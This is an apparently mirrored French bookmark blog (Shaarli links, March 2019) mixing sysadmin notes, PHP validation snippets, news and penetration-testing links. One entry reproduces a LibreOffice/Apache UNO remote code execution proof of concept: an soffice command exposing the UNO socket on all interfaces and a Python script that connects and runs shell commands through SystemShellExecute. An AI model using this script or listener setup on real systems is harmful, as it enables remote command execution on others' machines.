PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links

⇐ retour index

Note : fréquence NTP - Le Hollandais Volant

vendredi 22 mars 2019 à 14:09
sudo nano /etc/ntp.conf
> server ntp.ubuntu.com iburst
# devient :
> server ntp.ubuntu.com iburst minpoll 12 maxpoll 17

sudo systemctl restart ntp
Permalink

GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester

vendredi 22 mars 2019 à 11:20

Permalink

Google goo.gl URL Shortener Closing March 30, 2019 - Liens en vrac de sebsauvage

jeudi 21 mars 2019 à 15:42
Bah oui, les raccourcisseurs d'URL, raccourcissent aussi leur vie.
Permalink

Buffer Overflow Practical Examples , ret2libc - protostar stack6 | 0xRick Owned Root !

jeudi 21 mars 2019 à 11:45

Permalink

PHP: filter_var - Manual

mercredi 20 mars 2019 à 15:45
https://secure.php.net/manual/fr/function.filter-var.php
https://secure.php.net/manual/fr/function.filter-var-array.php
https://php.net/manual/fr/filter.filters.validate.php
https://secure.php.net/manual/fr/filter.filters.sanitize.php
https://secure.php.net/manual/fr/filter.filters.php

$var = filter_var('0755', FILTER_VALIDATE_INT, $options);
$var = filter_var('уникум@из.рф', FILTER_VALIDATE_EMAIL);
$var = filter_var('oops', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);

$data = [ "a" => 42, "b" => "tes%00t", "plop" => "yo"];
$args = [ "a" => FILTER_VALIDATE_INT, "b" => FILTER_SANITIZE_ENCODED];
var_dump(filter_var_array($data, $args));
Permalink

Control Android Devices From Your Desktop With scrcpy (Ubuntu, Fedora, Debian, Linux Mint Installation) - Linux Uprising Blog

mardi 19 mars 2019 à 14:27
via https://sebsauvage.net/links/?21CrwQ
Permalink

Msfconsole Commands - Metasploit Unleashed

vendredi 15 mars 2019 à 16:15

Permalink

Déploiement de la 5G : l'Allemagne victime collatérale du bras de fer opposant Huawei aux USA - Cyberguerre

vendredi 15 mars 2019 à 15:52
Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
Permalink

Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

vendredi 15 mars 2019 à 14:43
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

vendredi 15 mars 2019 à 11:02
https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
Permalink

Category:Metasploitable - charlesreid1

vendredi 15 mars 2019 à 10:16

Permalink

DARPA Is Building a $10 Million, Open Source, Secure Voting System - Motherboard

vendredi 15 mars 2019 à 09:44
à suivre
Permalink

GitHub - rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

jeudi 14 mars 2019 à 10:32

Permalink

DEEP DARK & ACID TECHNO MIX 2018 | MAKE ACID GREAT AGAIN - YouTube

jeudi 14 mars 2019 à 09:56
via https://www.nothing-is-3d.com/links/?2uh_yw
Permalink

GitHub - thelinuxchoice/blackeye: The most complete Phishing Tool, with 32 templates +1 customizable

jeudi 14 mars 2019 à 09:32
Quelqu'un a créé un outil de phishing qui copie 32 sites.
Permalink

ArchiveBox – Un clone d’Archive.org à héberger vous-même – Korben

mercredi 13 mars 2019 à 17:17
https://github.com/pirate/ArchiveBox
https://github.com/pirate/ArchiveBox/wiki/Usage
https://archive.sweeting.me/
Permalink

Désabonnez-moi ! | ploum.net

mardi 12 mars 2019 à 14:35
Note :
«
Bonjour,

En vertu de la loi RGPD, pourriez-vous m’informer de la manière par laquelle vous avez obtenu mes coordonnées et effacer toutes données me concernant de vos différentes bases de données. Si vous les avez acquises, merci de me donner les coordonnées de votre fournisseur.

Bien à vous,
»

via https://sebsauvage.net/links/?kGupXg
Permalink

ffmpeg, la boite à outils multimédia - Documentation - Wiki - Linuxtricks

dimanche 10 mars 2019 à 14:09
via http://abel.antunes.free.fr/shaarli/index.php5?wnjmEA
Permalink

Extract Meta Data

samedi 9 mars 2019 à 20:22

Permalink

5G et espionnage : la loi taillée contre Huawei avance malgré les critiques - Politique - Numerama

vendredi 8 mars 2019 à 16:04
Donc on pourra enfin bannir le matériel américain ? (Microsoft, Cisco Systems, DELL, HP, IBM,...)
^_^

Permalink